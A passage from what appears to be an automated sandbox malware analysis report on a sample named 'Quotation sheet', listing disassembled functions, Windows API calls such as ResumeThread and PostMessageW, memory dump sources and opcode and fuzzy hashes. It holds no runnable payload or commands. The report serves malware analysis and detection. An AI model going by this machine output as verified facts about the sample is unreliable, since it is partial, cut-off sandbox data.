                                                                                                                        • Opcode Fuzzy Hash: 86f3425112f1f151c6d86e69af2c5041702c0dbf6848edaf4466badc53500908
                                                                                                                        • Instruction Fuzzy Hash: CE11E3B58003499FDB10DF99D445BEEFBF8FB48324F108459E519A7210D375A944CFA1
                                                                                                                        Function 059D54B9 Relevance: 1.5, APIs: 1, Instructions: 46timeCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SetTimer.USER32(?,01A56428,?,?,?,?,?,?,059D5378,00000000,00000000,?), ref: 059D551D
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2352504395.00000000059D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_59d0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Timer
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2870079774-0
                                                                                                                        • Opcode ID: efd610d03802043c6c37383d9258c91480652a7b743d47a52f65471742e26f87
                                                                                                                        • Instruction ID: 21b86325519832fff770c068bb2111bccd77a6f4c4fa4e1ab7b433b2404e01e3
                                                                                                                        • Opcode Fuzzy Hash: efd610d03802043c6c37383d9258c91480652a7b743d47a52f65471742e26f87
                                                                                                                        • Instruction Fuzzy Hash: 6111E0B58003499FDB10CF9AD845BDEFBF8FB48720F208459E559A7210D3B5A944CFA1
                                                                                                                        Function 078CC1A1 Relevance: 1.5, APIs: 1, Instructions: 46windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • PostMessageW.USER32(?,?,?,?), ref: 078CC205
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2358604916.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_78c0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessagePost
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 410705778-0
                                                                                                                        • Opcode ID: 29dfd9930440fd2527b31e01d6be77bd775d7104b44f0e699abe40fb8ef38cd4
                                                                                                                        • Instruction ID: 837abc2d77b96230de9ae5e055ed42f8c9b40f41f43ccfe852e18a3d53543dc7
                                                                                                                        • Opcode Fuzzy Hash: 29dfd9930440fd2527b31e01d6be77bd775d7104b44f0e699abe40fb8ef38cd4
                                                                                                                        • Instruction Fuzzy Hash: 2011F2B68003499FDB10DF9AD885BDEBBF8FB48724F14841AE558A3210D379A944CFA1
                                                                                                                        Function 078C7F37 Relevance: 1.5, APIs: 1, Instructions: 46threadCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2358604916.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_78c0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ResumeThread
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 947044025-0
                                                                                                                        • Opcode ID: 10e27b1a7a5b49c231249e3f09f8e66c179dea5526963c6690aba187ebaad65c
                                                                                                                        • Instruction ID: d819d20a047261315be9c5e31e3734a01a6a46d5a89dd3915683d4ec989e524d
                                                                                                                        • Opcode Fuzzy Hash: 10e27b1a7a5b49c231249e3f09f8e66c179dea5526963c6690aba187ebaad65c
                                                                                                                        • Instruction Fuzzy Hash: B61136B19043498FDB10CFA9C4457EEFBF0AF98224F24885EC159A7240CB799544CB95
                                                                                                                        Function 078CC1A8 Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • PostMessageW.USER32(?,?,?,?), ref: 078CC205
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2358604916.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_78c0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessagePost
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 410705778-0
                                                                                                                        • Opcode ID: b0f1eb1e561183a7edabf88231187d8758df9ff2bc1c72684eb84d0984793745
                                                                                                                        • Instruction ID: 57b2814364f083e197b50e070efc458ccf18048299ae648bbdb1d89507cc4f2b
                                                                                                                        • Opcode Fuzzy Hash: b0f1eb1e561183a7edabf88231187d8758df9ff2bc1c72684eb84d0984793745
                                                                                                                        • Instruction Fuzzy Hash: 0C11D3B5800349DFDB10CF9AD545BDEBBF8FB48724F10845AD558A7210D375A944CFA1
                                                                                                                        Function 078C7F5E Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2358604916.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_78c0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ResumeThread
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 947044025-0
                                                                                                                        • Opcode ID: 0ae534e5c455acfdd152097cbb14ab921c3fb49286099ed6e51b93163de677e4
                                                                                                                        • Instruction ID: 3496e7ead8f5720d045a5cf9cb69ab9639d06834e25946bf6ba09f79f657f7cf
                                                                                                                        • Opcode Fuzzy Hash: 0ae534e5c455acfdd152097cbb14ab921c3fb49286099ed6e51b93163de677e4
                                                                                                                        • Instruction Fuzzy Hash: 31016DB190030A8FEF14DFAAC4443AEFBF5AF94324F14881ED119A7240CB799445CF90
                                                                                                                        Function 094D2F00 Relevance: .5, Instructions: 523COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2362099019.00000000094D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_94d0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: f7ac43e2bbc1dcdd0acbeb3a4b271ac5095c3547d7e472e28863434faa8b4625
                                                                                                                        • Instruction ID: 953513f21aa68d0f220ea7d7f9b03a065561d1547dde7e23559b54c60d1b7c87
                                                                                                                        • Opcode Fuzzy Hash: f7ac43e2bbc1dcdd0acbeb3a4b271ac5095c3547d7e472e28863434faa8b4625
                                                                                                                        • Instruction Fuzzy Hash: 62420230D00619CFCB15EFA8C8556DCBBB1BF49304F1182AAD5497B264EB30AA99CF91
                                                                                                                        Function 094D2EF1 Relevance: .5, Instructions: 520COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2362099019.00000000094D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_94d0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 672dc43fdba40c6e21098a1dd4351cd7be90185d5ed6ff539f2a80961ee1db1c
                                                                                                                        • Instruction ID: f60e2de9f0f51dc0f3f45c75ed5f398d026475bd2af6cb3f21b225050bbdaf7c
                                                                                                                        • Opcode Fuzzy Hash: 672dc43fdba40c6e21098a1dd4351cd7be90185d5ed6ff539f2a80961ee1db1c
                                                                                                                        • Instruction Fuzzy Hash: 36420430D00619CFCF15EFA8C8556DCBBB1BF49304F1182AAD5497B264EB30AA99CF91
                                                                                                                        Function 094DA290 Relevance: .5, Instructions: 494COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2362099019.00000000094D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_94d0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 836f04fd44af52a9358785b5f8d406414be287aa5b4054aef905934f14129611
                                                                                                                        • Instruction ID: 6eef16affa64914932d8769d5bf5711d685b625f9e9799bcc919c20ba451b23a
                                                                                                                        • Opcode Fuzzy Hash: 836f04fd44af52a9358785b5f8d406414be287aa5b4054aef905934f14129611
                                                                                                                        • Instruction Fuzzy Hash: D7026B38B062188FCB18DFA8D4A867E7BB6FF89740F14506AE406DB355DF359C428B91
                                                                                                                        Function 094D3728 Relevance: .5, Instructions: 475COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2362099019.00000000094D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_94d0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: b4e72c0be2076bad61c0efa18157d5e6f535146bd52f1434a330a8d80284d957
                                                                                                                        • Instruction ID: df220cfbc7b7521444d184cf24b857f96e59c1f6da388a512491ae5dc441911c
                                                                                                                        • Opcode Fuzzy Hash: b4e72c0be2076bad61c0efa18157d5e6f535146bd52f1434a330a8d80284d957
                                                                                                                        • Instruction Fuzzy Hash: A0126F35A00709CFCF15DF64C454A9EB7B2FF89304F10869AE949AB250EB71EA85CF91
                                                                                                                        Function 094D0E04 Relevance: .3, Instructions: 336COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2362099019.00000000094D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_94d0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: a6329384e7b0077a935cee0a61ec0db4691094e88a193444efac5c77ace86a34
                                                                                                                        • Instruction ID: bbab12176d39fdf25d06691c05271a00cf0932c9327c11fa231c75d0892bb963
                                                                                                                        • Opcode Fuzzy Hash: a6329384e7b0077a935cee0a61ec0db4691094e88a193444efac5c77ace86a34
                                                                                                                        • Instruction Fuzzy Hash: E6B1DE74A06209CFDF25DFA5C4646AEBBF2FF88300F20456ED40AA7341DB319952CB51
                                                                                                                        Function 094D5D76 Relevance: .3, Instructions: 325COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2362099019.00000000094D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_94d0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 6d77094d59cfdc9e31b6f47e4949d7d308dfdcafe0314c6e796467f4e8f955f9
                                                                                                                        • Instruction ID: 0ff1f87a429211b775acf14f45e3b26dc7d3509329d939f59681e0d06156b806
                                                                                                                        • Opcode Fuzzy Hash: 6d77094d59cfdc9e31b6f47e4949d7d308dfdcafe0314c6e796467f4e8f955f9
                                                                                                                        • Instruction Fuzzy Hash: 2DC13C34B112199FDB14EFA8D858A6EBBF6BF88740F148129F505AB395CF309C41CBA1
                                                                                                                        Function 094D2958 Relevance: .2, Instructions: 207COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2362099019.00000000094D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_94d0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: c4ed0586e26e2ba21de8ccf7cfe307387715c7816631b17b6b434faf27a15b2d
                                                                                                                        • Instruction ID: e0eed86764fb8c27f0ac1c315fc35c717680c6194ea082dd64c5affefa6512d9
                                                                                                                        • Opcode Fuzzy Hash: c4ed0586e26e2ba21de8ccf7cfe307387715c7816631b17b6b434faf27a15b2d
                                                                                                                        • Instruction Fuzzy Hash: 3781D334A01209DFDB11EF68D4A87ADBBB0FF44300F11816BE465A73A4EBB0D951CB90
                                                                                                                        Function 094DA608 Relevance: .2, Instructions: 189COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2362099019.00000000094D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_94d0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 3e5b6d37ccf9856ba5f2eba0697c5129152480f5e643058ce31e417608e7c6a5
                                                                                                                        • Instruction ID: 1adf3586b401cb3e21d88f1faed683d5c695de42bfd776a85441d9c22e48060d
                                                                                                                        • Opcode Fuzzy Hash: 3e5b6d37ccf9856ba5f2eba0697c5129152480f5e643058ce31e417608e7c6a5
                                                                                                                        • Instruction Fuzzy Hash: AB711D78E06208DFCB14DFA4D4946BEBBB6FB89300F10912AE416A7755DB345D06CBD0
                                                                                                                        Function 094DA707 Relevance: .2, Instructions: 175COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2362099019.00000000094D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_94d0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 56c6fb840ae0889296471e3d1cc4f95641e5e98bc97f05d9528e52a55b1ee92c
                                                                                                                        • Instruction ID: 0849350a1c84d8bd520d6fc3b7564705432fa5fea0be10d110d050356de6317d
                                                                                                                        • Opcode Fuzzy Hash: 56c6fb840ae0889296471e3d1cc4f95641e5e98bc97f05d9528e52a55b1ee92c
                                                                                                                        • Instruction Fuzzy Hash: C3710878E06218DFCB14DFA4E4986BEBBB6FB89300F105129E406A7749DB385D06CBD0
                                                                                                                        Function 094DDA8D Relevance: .1, Instructions: 144COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2362099019.00000000094D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_94d0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 5a5670b6511c7148ada94850da36a3bb67f46aa316ecacfa51babbbeea59d838
                                                                                                                        • Instruction ID: 56c99af0450ee9d31a73c7f2079a432c48bc081f75477a48571566f590ed6181
                                                                                                                        • Opcode Fuzzy Hash: 5a5670b6511c7148ada94850da36a3bb67f46aa316ecacfa51babbbeea59d838
                                                                                                                        • Instruction Fuzzy Hash: CF512478D0A219CFDF10CFE5C5A46EDBBBAEF4A300F10A21AE50AA7781D7355946CB40
                                                                                                                        Function 094D1F4C Relevance: .1, Instructions: 124COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2362099019.00000000094D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_94d0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: be46bcc56baa50f4507f0f4736a8a05b0fdd4cb2fbd65cd8ca6f4a0be743f29f
                                                                                                                        • Instruction ID: 9e61c0b6278599ed8a1560ffe43a1f02a0740adc7e9040b5e1f8ddd0dcf83b09
                                                                                                                        • Opcode Fuzzy Hash: be46bcc56baa50f4507f0f4736a8a05b0fdd4cb2fbd65cd8ca6f4a0be743f29f
                                                                                                                        • Instruction Fuzzy Hash: F041B878E0651A9FDB15AF65C8797AB7BF0FB44B40F104427E822EB354F6B2CD118A90
                                                                                                                        Function 094D2BD0 Relevance: .1, Instructions: 122COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2362099019.00000000094D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_94d0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 763964a63d94f8bdd54a8d7abc47649647f4eba46d5c231bb6643751d8efd909
                                                                                                                        • Instruction ID: 8f0612791a734eacfe9cf94f547b2a40aafe7a52c688bf1674776505352fe1a6
                                                                                                                        • Opcode Fuzzy Hash: 763964a63d94f8bdd54a8d7abc47649647f4eba46d5c231bb6643751d8efd909
                                                                                                                        • Instruction Fuzzy Hash: 7A411978E0621A9FCB16AF64C8796AB7BF0FB05740F100457E852AB355F6B28D12CB91
                                                                                                                        Function 094DEA7A Relevance: .1, Instructions: 121COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2362099019.00000000094D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_94d0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 0dafbdffeb6a2a15be496c9336cd73628c705d70b02d9535589259a6a8c02269
                                                                                                                        • Instruction ID: a97f3eb6aebeb5b2e8e24daf1689f6b54a4031703be198878b1eeec29137c2df
                                                                                                                        • Opcode Fuzzy Hash: 0dafbdffeb6a2a15be496c9336cd73628c705d70b02d9535589259a6a8c02269
                                                                                                                        • Instruction Fuzzy Hash: 07412A78D0A258CFDB10DFE5C0A46EEBBB5FB0A311F10919AD009BB206D7319886CF51
                                                                                                                        Function 094D0DB4 Relevance: .1, Instructions: 119COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2362099019.00000000094D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_94d0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: e6eb71c0a4d5c8546b5ca5ceaad1a20d01ecdd0ac0c738996cd95cd44f053c76
                                                                                                                        • Instruction ID: 59c3da357c1a8139a499d55380015bfafb79a3309f741aafe8dfce5f31663654
                                                                                                                        • Opcode Fuzzy Hash: e6eb71c0a4d5c8546b5ca5ceaad1a20d01ecdd0ac0c738996cd95cd44f053c76
                                                                                                                        • Instruction Fuzzy Hash: 68414034A152089FDB14DF69D864AADBBB2EF89310F14856AF801BB3A0DB74ED40CB50
                                                                                                                        Function 094D13D9 Relevance: .1, Instructions: 119COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2362099019.00000000094D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_94d0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 7dd22133764cab6cfbd9264fa65688f5168212cdfda61b59a90640d98dd9ce68
                                                                                                                        • Instruction ID: 6de414583420f0645d3f9f2aab8ae5ea534104919dd7bc6813889cec12c36b6f
                                                                                                                        • Opcode Fuzzy Hash: 7dd22133764cab6cfbd9264fa65688f5168212cdfda61b59a90640d98dd9ce68
                                                                                                                        • Instruction Fuzzy Hash: 18415334A152089FDB14DFA9D864A9DBBF2EF89310F14816AF401BB3A0DB74ED41CB50
                                                                                                                        Function 094D678F Relevance: .1, Instructions: 117COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2362099019.00000000094D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_94d0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 974275023f9db99f3936b30a04be9f50cae2b5a4d76e15e8303778e8d04c6283
                                                                                                                        • Instruction ID: 01c82fbbf5ce2ce3e1ee446499c864f88c1b490a180efc12b5a7ea83d974a8ec
                                                                                                                        • Opcode Fuzzy Hash: 974275023f9db99f3936b30a04be9f50cae2b5a4d76e15e8303778e8d04c6283
                                                                                                                        • Instruction Fuzzy Hash: 94412634A0111ADFDB059FA4D854AAEBBA6FF88754F148029F8059B394DB349D52CBE0
                                                                                                                        Function 094D17C8 Relevance: .1, Instructions: 104COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2362099019.00000000094D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_94d0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 42c8d460a0416222bdbedfedd08f3f341544e2c576b8cbd428668b3c0e07e11e
                                                                                                                        • Instruction ID: cb706970fb9e5e79bfcc4a432c31b6f3a4de734dba4d23fda90fc0040b3dcd22
                                                                                                                        • Opcode Fuzzy Hash: 42c8d460a0416222bdbedfedd08f3f341544e2c576b8cbd428668b3c0e07e11e
                                                                                                                        • Instruction Fuzzy Hash: 9A412571E05218DFEB259FA5D9985ADFFB2FF88300F21815AD8457B255DB3188A1CF40
                                                                                                                        Function 094DF288 Relevance: .1, Instructions: 103COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2362099019.00000000094D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_94d0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 88235620af2c05d767bb3f98029dae6723110d4a4046e72f8673fcc95a73b310
                                                                                                                        • Instruction ID: 8dd0c54206d16aeacc4e4fa8784a88dfaedb70d8bdef0b59e1f2aaa1826f2200
                                                                                                                        • Opcode Fuzzy Hash: 88235620af2c05d767bb3f98029dae6723110d4a4046e72f8673fcc95a73b310
                                                                                                                        • Instruction Fuzzy Hash: 00418D78E16208DFDB24DFA9D4546EEBBF6EF89300F0090A6E416A7350DB359945CFA0
                                                                                                                        Function 094DD0D0 Relevance: .1, Instructions: 102COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2362099019.00000000094D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_94d0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: eca37005f8a5fd5f800c6281bd60d5a417c984a5ed860009e4664adcd1bb3b0a
                                                                                                                        • Instruction ID: b0560b9e1dc95f8cbcd8e8d91acf81a897d092dc8f78bf125b687bc82ed9e5db
                                                                                                                        • Opcode Fuzzy Hash: eca37005f8a5fd5f800c6281bd60d5a417c984a5ed860009e4664adcd1bb3b0a
                                                                                                                        • Instruction Fuzzy Hash: BE413D78E06219EBDB04DFA9D8946EEBBF6FF89300F10912AE409A7794C7345D41CB90
                                                                                                                        Function 094DF298 Relevance: .1, Instructions: 102COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2362099019.00000000094D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_94d0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: db05c332d2561005238d0557c83bfb99f849ed63be2011ad696f8b640980e80b
                                                                                                                        • Instruction ID: d394752c3ff9b4102f0b84abf1cb456eebd2ab0bd2cbddb329ca409efb01266a
                                                                                                                        • Opcode Fuzzy Hash: db05c332d2561005238d0557c83bfb99f849ed63be2011ad696f8b640980e80b
                                                                                                                        • Instruction Fuzzy Hash: 4B415B78E16208DFDB14DFA9D4506EEBBF6EF89300F1090A6E816A7350DB359945CFA0
                                                                                                                        Function 094DD0C1 Relevance: .1, Instructions: 100COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2362099019.00000000094D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_94d0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: dd02a744499405560343d44089336c82a18b8db43257f6f88dc05668e129189c
                                                                                                                        • Instruction ID: 3cac5aaf97854eaddd4d0f686feb9be5b1d1684dfb346f01e1ac64f824f9616c
                                                                                                                        • Opcode Fuzzy Hash: dd02a744499405560343d44089336c82a18b8db43257f6f88dc05668e129189c
                                                                                                                        • Instruction Fuzzy Hash: 99413C78E06219EBDB04DFA9D8556EEBBB6FB89300F00912AE409A7795C7345D41CF90
                                                                                                                        Function 094DDC90 Relevance: .1, Instructions: 91COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2362099019.00000000094D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_94d0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: bab2c23121d45c5ad77f9a1d180a92a3f9644be56cbe4fe72fd6c211c6839739
                                                                                                                        • Instruction ID: b97efbb8fa3029ce23c3333e77ae8a353514ce43c1aa991aeece1db19737d034
                                                                                                                        • Opcode Fuzzy Hash: bab2c23121d45c5ad77f9a1d180a92a3f9644be56cbe4fe72fd6c211c6839739
                                                                                                                        • Instruction Fuzzy Hash: 523134B69002099FCF14CFA9C845A9EBFF5EB48320F10846AE909A7350D775A904CBA4
                                                                                                                        Function 094DD5F0 Relevance: .1, Instructions: 84COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2362099019.00000000094D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_94d0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: b50a94434ceab638d97fdeed47298653e8d5da884b652cc0865b2b522aea8699
                                                                                                                        • Instruction ID: 1434eecb3c194d4c182b83570dc300d2ea7fec164491ad9ed580bc3333afe27e
